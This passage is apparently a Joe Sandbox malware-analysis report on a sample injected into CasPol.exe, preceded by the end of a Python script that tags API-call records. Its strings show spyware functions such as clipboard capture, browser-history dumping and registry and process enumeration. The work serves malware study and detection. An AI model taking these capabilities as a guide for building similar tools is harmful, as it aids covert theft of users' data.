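        return {"dwDesiredAccess": [n for bit, n in PROCESS_ACCESS.items() if first & bit] or [f"0x{first:X}"]}
    if name.startswith("RegOpenKeyEx") and len(args) >= 4:
        sam = _literal(args[3])  # samDesired: 0x20019 is KEY_READ
        return {"hKey": HKEY_NAMES.get(first, f"0x{first:X}"),
                "samDesired": "KEY_READ" if sam == 0x20019 else ("?" if sam is None else f"0x{sam:X}")}
    if name == "Sleep":
        return {"milliseconds": first}
    if name == "CreateToolhelp32Snapshot":
        return {"TH32CS_SNAPPROCESS": bool(first & 0x2)}
    return {}


def tag_capabilities(record):
    """Coarse capability tags (this example's own names) derived from one function's API set."""
    names = {c["name"] for c in record["calls"]}
    tags = set()
    if "CreateToolhelp32Snapshot" in names and any(n.startswith("Process32Next") for n in names):
        tags.add("process-enumeration")
    if "IsWow64Process" in names:
        tags.add("wow64-check")
    if any(n.startswith("RegOpenKeyEx") for n in names) and any(n.startswith("RegQueryValueEx") for n in names):
        tags.add("registry-read")
    if "Sleep" in names:
        tags.add("delay")
    return tags


def summarize(records):
    """One row per function: tags, decoded constants, strings, and the fuzzy hash to pivot on."""
    return [{"tags": sorted(tag_capabilities(r)),
             "constants": {c["name"]: d for c in r["calls"] if (d := decode_constants(c))},
             "strings": [s for s in r["meta"].get("String ID", "").split("$") if s],
             "instruction_fuzzy_hash": r["meta"].get("Instruction Fuzzy Hash", "")} for r in records]


if __name__ == "__main__":
    for row in summarize(parse_records(SAMPLE)):
        print(row)
```

Feeding the full text of this section to parse_records works the same way, since every function block on the page starts with the "APIs" header that the parser splits on. The tagging is deliberately coarse: it says what a function is capable of from its imports alone, not what it does with them, so a "process-enumeration" tag is a reason to read the disassembly, not a verdict on its own.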
APIs
• GetEnvironmentStringsW.KERNEL32 ref: 0044F3E3
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F406
  • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F42C
• _free.LIBCMT ref: 0044F43F
• FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F44E
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
• String ID:
• API String ID: 336800556-0
• Opcode ID: bd5b513fc8b609e28947bb0fbcaa4a85653cdf481583ed06f966610d709b3706
• Instruction ID: b6d7bf627ac8e1e23e8e90154f8049d5dc13ee9613ce4caf203d647ba434722a
• Opcode Fuzzy Hash: bd5b513fc8b609e28947bb0fbcaa4a85653cdf481583ed06f966610d709b3706
• Instruction Fuzzy Hash: 2401DF72602721BF37211ABB5C8DC7F6AACDEC6FA5355013AFD04D2202DE688D0691B9
APIs
• GetEnvironmentStringsW.KERNEL32 ref: 1000715C
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1000717F
  • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 100071A5
• _free.LIBCMT ref: 100071B8
• FreeEnvironmentStringsW.KERNEL32(00000000), ref: 100071C7
Memory Dump Source
• Source File: 00000014.00000002.697379878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000014.00000002.697370676.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000014.00000002.697379878.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_10000000_CasPol.jbxd
Similarity
• API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
• String ID:
• API String ID: 336800556-0
• Opcode ID: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
• Instruction ID: fdf90bdbf822fabaf3dd9d310e80898d5fc59248e37e3ebe61ec6e18e74c85b1
• Opcode Fuzzy Hash: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
• Instruction Fuzzy Hash: 6601D872A01225BB73129BBE5C8CDBF2A6DFBC69E0311012AFD0CC7288DB658C0181B0
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetLastError.KERNEL32(00000000,?,00000000,1000636D,10005713,00000000,?,10002249,?,?,10001D66,00000000,?,?,00000000), ref: 10005B7F
                                                                                                                                                                          • _free.LIBCMT ref: 10005BB4
                                                                                                                                                                          • _free.LIBCMT ref: 10005BDB
                                                                                                                                                                          • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BE8
                                                                                                                                                                          • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BF1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.697379878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.697370676.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.697379878.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_10000000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$_free
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3170660625-0
                                                                                                                                                                          • Opcode ID: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                                                                                                                                                                          • Instruction ID: a404960836b3e2f032ab47abdd1028028b52a365ddf0c47563f665e512f3cffd
                                                                                                                                                                          • Opcode Fuzzy Hash: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                                                                                                                                                                          • Instruction Fuzzy Hash: 5501F47A108A52A7F202E7345C85E1F3AAEDBC55F37220025FD19A615EEF73FD024164
                                                                                                                                                                          APIs
                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                                                                                                                                                                          • lstrcatW.KERNEL32(?,?), ref: 10001EAC
                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                                                                                                                                                                          • lstrcatW.KERNEL32(?,100010DF), ref: 10001ED3
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.697379878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.697370676.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.697379878.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_10000000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: lstrlen$lstrcat
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 493641738-0
                                                                                                                                                                          • Opcode ID: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                                                                                                                                                                          • Instruction ID: f5d9027fafc921fe84ae6627056796c55de3fa1ad923a59450c5185d8ca5453c
                                                                                                                                                                          • Opcode Fuzzy Hash: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                                                                                                                                                                          • Instruction Fuzzy Hash: D8F082261002207AF621772AECC5FBF7B7CEFC6AA0F04001AFA0C83194DB54684292B5
                                                                                                                                                                          APIs
                                                                                                                                                                          • _free.LIBCMT ref: 00450A54
                                                                                                                                                                            • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                                                                                                                                            • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                                                                                                          • _free.LIBCMT ref: 00450A66
                                                                                                                                                                          • _free.LIBCMT ref: 00450A78
                                                                                                                                                                          • _free.LIBCMT ref: 00450A8A
                                                                                                                                                                          • _free.LIBCMT ref: 00450A9C
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                          • Opcode ID: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                                                                                                                                                          • Instruction ID: 72fff71e7c38304dd33e0b5962bcef44c8ad6e5fbb3f6de42623dcf71f8de19c
                                                                                                                                                                          • Opcode Fuzzy Hash: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                                                                                                                                                          • Instruction Fuzzy Hash: F7F012765053006B9620EB5DE883C1773D9EA157117A68C1BF549DB652C778FCC0866C
                                                                                                                                                                          APIs
                                                                                                                                                                          • _free.LIBCMT ref: 100091D0
                                                                                                                                                                            • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                                                                                                                                                            • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                                                          • _free.LIBCMT ref: 100091E2
                                                                                                                                                                          • _free.LIBCMT ref: 100091F4
                                                                                                                                                                          • _free.LIBCMT ref: 10009206
                                                                                                                                                                          • _free.LIBCMT ref: 10009218
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.697379878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.697370676.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.697379878.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_10000000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                          • Opcode ID: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                                                                                                                                                                          • Instruction ID: a08e021c65853776c99c3fd86fadada58ae96d962e635c5153d22f52a77de1c5
                                                                                                                                                                          • Opcode Fuzzy Hash: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                                                                                                                                                                          • Instruction Fuzzy Hash: 77F06DB161C650ABE664DB58EAC6C4B7BEDFB003E13608805FC4DD7549CB31FC809A64
                                                                                                                                                                          APIs
                                                                                                                                                                          • _free.LIBCMT ref: 00444106
                                                                                                                                                                            • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                                                                                                                                            • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                                                                                                          • _free.LIBCMT ref: 00444118
                                                                                                                                                                          • _free.LIBCMT ref: 0044412B
                                                                                                                                                                          • _free.LIBCMT ref: 0044413C
                                                                                                                                                                          • _free.LIBCMT ref: 0044414D
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                          • Opcode ID: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                                                                                                                                                          • Instruction ID: 0e9c2896d1a2baf17e4b980eca3efa8a556ca0a6e45d827b59e8921ed08f8926
                                                                                                                                                                          • Opcode Fuzzy Hash: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                                                                                                                                                          • Instruction Fuzzy Hash: 91F03AB18025208FA731AF2DBD528053BA1A705720356853BF40C62A71C7B849C2DFDF
                                                                                                                                                                          APIs
                                                                                                                                                                          • _free.LIBCMT ref: 1000536F
                                                                                                                                                                            • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                                                                                                                                                            • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                                                          • _free.LIBCMT ref: 10005381
                                                                                                                                                                          • _free.LIBCMT ref: 10005394
                                                                                                                                                                          • _free.LIBCMT ref: 100053A5
                                                                                                                                                                          • _free.LIBCMT ref: 100053B6
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.697379878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.697370676.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.697379878.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_10000000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                          • Opcode ID: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
                                                                                                                                                                          • Instruction ID: ba906e9feca9bc6e71cd1aa5ebacb8f64a9f241ffe6b13fedf7f16c4e4854dfa
                                                                                                                                                                          • Opcode Fuzzy Hash: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
                                                                                                                                                                          • Instruction Fuzzy Hash: 38F0F478C18934EBF741DF28ADC140A3BB5F718A91342C15AFC1497279DB36D9429B84
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetWindowThreadProcessId.USER32(?,?), ref: 0041763E
                                                                                                                                                                          • GetWindowTextW.USER32(?,?,0000012C), ref: 00417670
                                                                                                                                                                          • IsWindowVisible.USER32(?), ref: 00417677
                                                                                                                                                                            • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                                                                                                                                            • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ProcessWindow$Open$TextThreadVisible
                                                                                                                                                                          • String ID: (VG
                                                                                                                                                                          • API String ID: 3142014140-3443974315
                                                                                                                                                                          • Opcode ID: 03ec91c272319b82483b2025ec8c7941203cead915101a711102ef9fde642a14
                                                                                                                                                                          • Instruction ID: 57afc706987f0d359dfa573bc041c79e98ae29994c94316b8148008c339bd05b
                                                                                                                                                                          • Opcode Fuzzy Hash: 03ec91c272319b82483b2025ec8c7941203cead915101a711102ef9fde642a14
                                                                                                                                                                          • Instruction Fuzzy Hash: 6E7109311082419AC365FB22D8959EFB3E5BFD4308F50493FF18A560E5EF746A49CB8A
                                                                                                                                                                          APIs
                                                                                                                                                                          • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413AF7
                                                                                                                                                                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00413B26
                                                                                                                                                                          • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710), ref: 00413BC6
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Enum$InfoQueryValue
                                                                                                                                                                          • String ID: [regsplt]
                                                                                                                                                                          • API String ID: 3554306468-4262303796
                                                                                                                                                                          • Opcode ID: e94edd3d2a55c356d4548ef980033c45c7e3dae0b14fa2fe493c2e04fae217b1
                                                                                                                                                                          • Instruction ID: fa843d34e07254c46a29a5d4d7bbb73928c81f50e0ccc4a220fcc0531dc04ae2
                                                                                                                                                                          • Opcode Fuzzy Hash: e94edd3d2a55c356d4548ef980033c45c7e3dae0b14fa2fe493c2e04fae217b1
                                                                                                                                                                          • Instruction Fuzzy Hash: DF512C72900219AADB11EB95DC86EEEB77DAF04304F1000BAE505F6191EF746B48CBA9
                                                                                                                                                                          APIs
                                                                                                                                                                          • _strpbrk.LIBCMT ref: 0044E7B8
                                                                                                                                                                          • _free.LIBCMT ref: 0044E8D5
                                                                                                                                                                            • Part of subcall function 0043BD68: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0043BD6A
                                                                                                                                                                            • Part of subcall function 0043BD68: GetCurrentProcess.KERNEL32(C0000417,?,00405103), ref: 0043BD8C
                                                                                                                                                                            • Part of subcall function 0043BD68: TerminateProcess.KERNEL32(00000000,?,00405103), ref: 0043BD93
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                                                                                                                                          • String ID: *?$.
                                                                                                                                                                          • API String ID: 2812119850-3972193922
                                                                                                                                                                          • Opcode ID: 425935087bf6a06ef5f668eca0c2840133b7cce1b1476d2e54c501535b2ee598
                                                                                                                                                                          • Instruction ID: bbc13fc8ee10fdca904a4e9292213e09ebfa005f106ef5a16faeda3ce4fd08f7
                                                                                                                                                                          • Opcode Fuzzy Hash: 425935087bf6a06ef5f668eca0c2840133b7cce1b1476d2e54c501535b2ee598
                                                                                                                                                                          • Instruction Fuzzy Hash: C251B175E00209AFEF14DFAAC881AAEF7B5FF58314F24416EE844E7341E6399A018B54
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000104), ref: 00443515
                                                                                                                                                                          • _free.LIBCMT ref: 004435E0
                                                                                                                                                                          • _free.LIBCMT ref: 004435EA
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _free$FileModuleName
                                                                                                                                                                          • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                          • API String ID: 2506810119-3657627342
                                                                                                                                                                          • Opcode ID: 85df99244543f45e80e68b9da345e50485f416d8f0a3fa02bb076d818d98866e
                                                                                                                                                                          • Instruction ID: e5efe6401a3e5f1db0e1141fbbc5a3d1caea7301f6195c2e8eaff0a3f5655f7e
                                                                                                                                                                          • Opcode Fuzzy Hash: 85df99244543f45e80e68b9da345e50485f416d8f0a3fa02bb076d818d98866e
                                                                                                                                                                          • Instruction Fuzzy Hash: D63193B1A00254BFEB21DF9A998199EBBF8EB84B15F10406BF40597311D6B88F41CB99
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000104), ref: 10004C1D
                                                                                                                                                                          • _free.LIBCMT ref: 10004CE8
                                                                                                                                                                          • _free.LIBCMT ref: 10004CF2
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.697379878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.697370676.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.697379878.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_10000000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _free$FileModuleName
                                                                                                                                                                          • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                          • API String ID: 2506810119-3657627342
                                                                                                                                                                          • Opcode ID: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                                                                                                                                                                          • Instruction ID: 12f2da1a58c9c923660241357757b5dddff340f6d61411cdc8d35d961f62cc7a
                                                                                                                                                                          • Opcode Fuzzy Hash: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                                                                                                                                                                          • Instruction Fuzzy Hash: EB31A0B5A01258EFFB51CF99CC81D9EBBFCEB88390F12806AF80497215DA709E41CB54
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066
                                                                                                                                                                            • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,7570D4DF,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,00475300), ref: 0041BA30
                                                                                                                                                                            • Part of subcall function 004185A3: CloseHandle.KERNEL32(004040F5), ref: 004185B9
                                                                                                                                                                            • Part of subcall function 004185A3: CloseHandle.KERNEL32(00465E84), ref: 004185C2
                                                                                                                                                                            • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                                                                                                                                                                          • Sleep.KERNEL32(000000FA,00465E84), ref: 00404138
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                                                                                                                                          • String ID: /sort "Visit Time" /stext "$@NG
                                                                                                                                                                          • API String ID: 368326130-3944316004
                                                                                                                                                                          • Opcode ID: 52ec7f42e83cb3d51f18f6545fe4dfece75fe75313d577a648afb874b5f25b75
                                                                                                                                                                          • Instruction ID: 88307c0d9f74f86904655d2c31cb74d6ebeba16a9e6c7dae8368527950f1c452
                                                                                                                                                                          • Opcode Fuzzy Hash: 52ec7f42e83cb3d51f18f6545fe4dfece75fe75313d577a648afb874b5f25b75
                                                                                                                                                                          • Instruction Fuzzy Hash: EB316171A001195ACB15FBA6DC969ED7375AF90308F00007FF60AB71E2EF785E49CA99
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 0040B7D2
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Init_thread_footer__onexit
                                                                                                                                                                          • String ID: [End of clipboard]$[Text copied to clipboard]$ mG
                                                                                                                                                                          • API String ID: 1881088180-2322839566
                                                                                                                                                                          • Opcode ID: f198baba7c6da98f7617eda9bb62b56e34bd4f8c8b4818ed2bcf8c9541119a36
                                                                                                                                                                          • Instruction ID: 5c7e69c9d376070a9f10adc198010d279a990252db190bacd7f595afc81a80c0
                                                                                                                                                                          • Opcode Fuzzy Hash: f198baba7c6da98f7617eda9bb62b56e34bd4f8c8b4818ed2bcf8c9541119a36
                                                                                                                                                                          • Instruction Fuzzy Hash: B5216D31A102198ACB14FBA6D8929EDB375AF54318F10403FE506771E2EF7C6D4ACA8C
APIs
• _wcslen.LIBCMT ref: 00416330
  • Part of subcall function 004138B2: RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
  • Part of subcall function 004138B2: RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004), ref: 004138DB
  • Part of subcall function 004138B2: RegCloseKey.KERNEL32(004660B4), ref: 004138E6
  • Part of subcall function 00409E1F: _wcslen.LIBCMT ref: 00409E38
Strings
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: _wcslen$CloseCreateValue
• String ID: !D@$h}v$okmode
• API String ID: 3411444782-3374175755
